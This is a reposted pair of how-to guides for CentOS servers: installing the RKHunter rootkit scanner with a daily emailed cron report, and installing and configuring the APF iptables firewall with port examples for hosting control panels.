Install RKHunter Product Name: RKHunter Product Version: 1.3.6 Homepage: Rootkit.nl - Protect your machine Description: rkhunter (Rootkit Hunter) is a Unix-based tool that scans for rootkits, backdoors and possible local exploits. It does this by comparing MD5 hashes of important files with known good ones in online database, searching for default directories (of rootkits), wrong permissions, hidden files, suspicious strings in kernel modules, and special tests for Linux and FreeBSD. Step 1: Downloading, Installing and Updateing cd /usr/local/src wget http://dfn.dl.sourceforge.net/sourceforge/rkhunter/rkhunter-1.3.6.tar.gz wget http://dfn.dl.sourceforge.net/sourceforge/rkhunter/rkhunter-1.3.6.tar.gz.sha1.txt sha1sum -c rkhunter-1.3.6.tar.gz.sha1.txt tar -zxvf rkhunter-1.3.6.tar.gz cd rkhunter-1.3.6 ./installer.sh --layout default --install /usr/local/bin/rkhunter --update /usr/local/bin/rkhunter --propupd rm -Rf /usr/local/src/rkhunter* cd Step 2: Adding daily cron job Step 2.1: Create run-file nano -w /etc/cron.daily/rkhunter.sh Step 2.2: Add this text to rkhunter.sh #!/bin/sh ( /usr/local/bin/rkhunter --versioncheck /usr/local/bin/rkhunter --update /usr/local/bin/rkhunter --cronjob --report-warnings-only ) | /bin/mail -s 'rkhunter Daily Run (PutYourServerNameHere)' your@email.here REMEMBER TO CHANGE (PutYourServerNameHere) AND your@email.here Step 2.3: Chmod rkhunter.sh to root only chmod 700 /etc/cron.daily/rkhunter.sh There you go! should be installed, and you will get a mail daily with a status on your system Sursa: Install RKHunter | SecureCentos.com

Install Firewall Guide for installing CSF Firewall will come later.. APF is used because its the site admins favorite, and its stable and simple to setup. Might be better for new guys? Fuel for discussion Product Name: APF (Advanced Firewall Policy) Product Version: 0.9.7 rev:1 Homepage: Advanced Policy Firewall | R-fx Networks Description: Advanced Policy Firewall (APF) is an iptables(netfilter) based firewall system designed around the essential needs of todays Internet deployed servers and the unique needs of custom deployed Linux installations. The configuration of APF is designed to be very informative and present the user with an easy to follow process, from top to bottom of the configuration file. The management of APF on a day-to-day basis is conducted from the command line with the apf command, which includes detailed usage information and all the features one would expect from a current and forward thinking firewall solution. Pre Setup: Make sure iptables are installed yum install iptables* -y Step 1: Download, unpack, install of APF from source. cd /usr/local/src wget http://www.rfxn.com/downloads/apf-current.tar.gz tar -zxf apf-current.tar.gz cd apf-9* ./install.sh Step 1.1: Cleanup source install files. rm -Rf /usr/local/src/apf-9* && cd Step 2: Backup orginal apf config cp /etc/apf/conf.apf /etc/apf/conf.apf.bak Step 3: Edit current APF Config nano -w /etc/apf/conf.apf Change: * RAB="0" to RAB="1" * RAB_PSCAN_LEVEL="2" to RAB_PSCAN_LEVEL="3" * TCR_PASS="1" to TCR_PASS="0" * DLIST_PHP="0" to DLIST_PHP="1" * DLIST_SPAMHAUS="0" to DLIST_SPAMHAUS="1" * DLIST_DSHIELD="0" to DLIST_DSHIELD="1" * DLIST_RESERVED="0" to DLIST_RESERVED="1" Step 3.1: Find IFACE_IN= and IFACE_OUT= in /etc/apf/conf.apf and verify that they match your network interface Step 3.2: Locate HELPER_SSH_PORT=”22? and change it to your SSH port IF you changed it in your sshd_config: Step 3.3: Locate IG_TCP_CPORTS=”22? and change it to your SSH port IF you changed it in your sshd_config: REMEMBER MAKE SURE YOU TO CHANGE YOUR SSHD PORT IN APF, IF YOU CHANGED IT IN SSHD_CONFIG You can run this command “cat /etc/ssh/sshd_config |grep Port” to see what port your SSHD uses Step 4: Restart the APF /usr/local/sbin/apf -r Step 5: Now relogin though ssh again, to verify that you still can login into your server Step 6: When your happy with your firewall and everything works fine, Edit /apf.conf find DEVEL_MODE=”1? and change it to DEVEL_MODE=”0? Step 7: Restart APF again /usr/local/sbin/apf -r Step 8: Make sure APF starts automatic after restart chkconfig --add apf chkconfig --level 345 apf on You should NOW have a firewall up and running! Enjoy Port setting example for different Hosting control panels: Directadmin: IG_TCP_CPORTS=”21,22,25,53,80,110,111,143,443,587,953,2222,3306,32769? IG_UDP_CPORTS=”53,111,631,724,5353,32768,32809? EGF=”1? EG_TCP_CPORTS=”21,22,25,26,27,37,43,53,80,110,113,443,465,873,2089? EG_UDP_CPORTS=”20,21,37,53,873? Cpanel: IG_TCP_CPORTS=”20,21,22,25,26,53,80,110,143,443,465,993,995,2082,2083,2086,2087,2095,2096? IG_UDP_CPORTS=”21,53,873? EGF=”1? EG_TCP_CPORTS=”21,22,25,26,27,37,43,53,80,110,113,443,465,873,2089? EG_UDP_CPORTS=”20,21,37,53,873? Troubleshooting: Problem: If you get this error apf(xxxxx): {glob} unable to load iptables module (ip_tables), aborting. Solution: Try changing SET_MONOKERN=”0? to SET_MONOKERN=”1? , then apf -r Problem: If you get this message: apf(xxxxx): {glob} !!DEVELOPMENT MODE ENABLED!! – firewall will flush every 5 minutes. Solution: you need to change DEVEL_MODE=1 to DEVEL_MODE=0, make sure your config is working first. Sursa: Install Firewall | SecureCentos.com